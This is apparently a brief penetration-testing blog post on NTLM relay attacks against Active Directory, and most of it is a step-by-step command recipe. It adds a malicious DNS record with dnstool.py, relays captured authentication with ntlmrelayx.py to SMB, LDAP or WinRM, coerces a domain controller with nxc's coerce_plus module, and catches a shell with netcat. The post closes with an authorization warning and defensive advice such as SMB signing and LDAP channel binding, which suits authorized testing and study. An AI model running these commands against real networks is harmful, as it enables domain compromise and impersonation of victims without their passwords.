Post

NTLM Relay

Posted Updated
Preview Image
By
1 min read
NTLM Relay

NTLM Relay

NTLM Relay is a man-in-the-middle (MITM) attack against the NTLM authentication protocol. When an NTLM authentication occurs between two machines (a client and a server), an attacker can:

  1. Intercept or coerce an authentication attempt.
  2. Relay that authentication request to another server.
  3. Authenticate to the target server as the victim — without knowing the victim’s password.

In short, NTLM Relay abuses NTLM’s lack of mutual authentication and the absence (or misconfiguration) of message signing.

First Method

⚙️ Setting Up a Malicious DNS Record (using dnstool.py)

1

python3 dnstool.py -u '$domain\$user' -p '$pass' <Full-DC-Name> -a add -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -d '$attacker_ip' -dns-ip $target_ip --tcp

What this does: Creates a DNS record that points a controlled hostname to the attacker machine, causing victims to connect to the attacker’s IP when resolving that name.

🧾 Verify the DNS Entry

1

dig localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.$domain @<Full-DC-Name> +tcp +short

🧨 Start the NTLM Relay Server

The relay server listens for incoming NTLM authentications and relays them to the target service. Example targets include WinRM, SMB, LDAP, LDAPS, etc.

1
2

# replace $Protocol with winrm, smb, ldap, etc.
ntlmrelayx.py -smb2support -t '$Protocol://$target'

🧨 Coerce a Victim Machine to Authenticate to You

Use coercion modules to force a system (for example, a domain controller or other host) to authenticate to the malicious hostname you created.

1

nxc smb $ip -u $user -p '$pass' -M coerce_plus -o LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA ALWAYS=true

🔓 Catch the Shell (if configured to spawn one)

1

nc localhost 11000

Second Method

Coming soon…

Notes & Recommendations

  • Replace variables (like $domain, $user, $pass, $attacker_ip, and $target_ip) with real values relevant to your environment.
  • Exercise caution: performing these techniques without authorization is illegal and unethical. Use only on systems you own or where you have explicit permission to test.
  • For defense, consider: enabling SMB signing and LDAP channel binding, disabling or restricting NTLM, applying Microsoft’s recommended mitigations, and monitoring for suspicious coercion activity.
AD- Attacks
NTLM Relay
This post is licensed under CC BY 4.0 by the author.